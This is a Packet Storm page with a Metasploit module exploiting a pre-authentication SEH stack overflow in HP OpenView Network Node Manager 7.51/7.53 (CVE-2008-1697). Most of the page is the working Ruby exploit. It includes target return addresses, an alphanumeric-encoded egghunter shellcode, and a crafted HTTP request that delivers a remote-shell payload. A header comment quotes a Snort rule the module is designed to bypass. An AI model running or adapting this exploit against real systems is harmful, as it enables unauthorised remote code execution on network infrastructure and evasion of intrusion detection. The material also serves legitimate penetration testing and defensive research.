what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow

HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow
Posted Dec 31, 2009
Authored by Mati Aharoni, bannedit | Site metasploit.com

This Metasploit module exploits a stack overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this.

tags | exploit, remote, web, overflow, shell, shellcode
advisories | CVE-2008-1697
SHA-256 | 3dc7da1a36dedf13ddf7ea5539aaac3f51e4cbdb8ecfab2652405871dd1aca71

HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


##
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow',
'Description' => %q{
This module exploits a stack overflow in HP OpenView Network Node Manager versions 7.53 and earlier.
Specifically this vulnerability is caused by a failure to properly handle user supplied input within the
HTTP request including headers and the actual URL GET request.

Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode
which was alphanumeric encoded by muts in the original exploit.

If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process
as soon as possible. Any connections get reset after a short period of time. This is probably some timeout
handling code that causes this.
},
'Author' =>
[
'bannedit',
# muts wrote the original exploit and did most of the initial work
# credit where credit is due. =)
'muts'
],

'Version' => '$Revision: 7970 $',
'References' =>
[
[ 'CVE', '2008-1697' ],
[ 'OSVDB', '43992' ],
[ 'BID', '28569' ],
],
'DefaultOptions' =>
{
'WfsDelay' => 45,
'EXITFUNC' => 'thread',
'InitAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x0a\x0d\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],

[ 'Windows 2003/zip.dll OpenView 7.53',
{
'Ret' => 0x6d633757 # pop pop ret
}
],

[ 'Windows 2000/jvm.dll OpenView NNM 7.51',
{
'Ret' => 0x6d356c6e # pop pop ret
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 02 2008'))

register_options(
[
Opt::RPORT(7510),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
], self.class)
end


def exploit

targ = target

if (target['auto'])
print_status("Detecting the remote version...")
resp = send_request_raw({'uri' => '/topology/home'}, 5)
if resp.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
end

case resp.body
when /NNM Release B.07.53/
targ = targets[1]
when /NNM Release B.07.51/
targ = targets[2]
else
raise RuntimeError, "Unable to determine a target automatically..."
# if snmp is running you could set the target based on community strings

end
end
print_status("Using target: #{targ.name}")
exploit_target(targ)
end


def exploit_target(targ)

# we have to use an egghunter in this case because of the restrictions
# on the characters we can use.
# we are using skape's egghunter alpha numeric encoded by muts
egghunter =
'%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+
'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+
'21*-q!au-q!au-oGSePAA%JMNU%521*-D'+
'A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1'+
'z1E-oRHEPAA%JMNU%521*-3s1--331--^'+
'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+
'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+
'U%521*-1-wD-1-wD-8$GwP'

print_status("Constructing the malformed http request")

buf = "http://"
buf << "\xeb" * 1101 # this gets mangled in such a way we can use less input
buf << "\x41" * 4 # sometimes less really is more
buf << "\x77\x21" # \xeb is restricted so we use a conditional jump which is always taken
buf << [targ.ret].pack('V')
buf << "G" * 32
buf << egghunter
buf << "\x41" * 100
buf << ":#{datastore['RPORT']}"

# T00W is the egg
payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded

begin
connect
resp = send_request_raw({
'uri' => buf + "/topology/home",
'version' => '1.1',
'method' => 'GET',
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => datastore['UserAgent'],
},
'data' => payload_buf
})
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
# do nothing let the exploit live this catches the
# connection reset by peer error which is expected
end

if not resp.nil?
raise RuntimeError, "The server responded, that wasn't supposed to happen!"
end

print_status("Malformed http request sent.")
print_status("Now we wait for the egg hunter to work it's magic. thx skape!")
handler
disconnect
end


def check

resp = send_request_raw({'uri' => '/topology/home'}, 5)
if resp.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
end

if (resp.body =~ /NNM Release B.07.53/ || resp.body =~ /NNM Release B.07.52/ || resp.body =~ /NNM Release B.07.51/)
return Exploit::CheckCode::Appears
end

return Exploit::CheckCode::Safe

end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close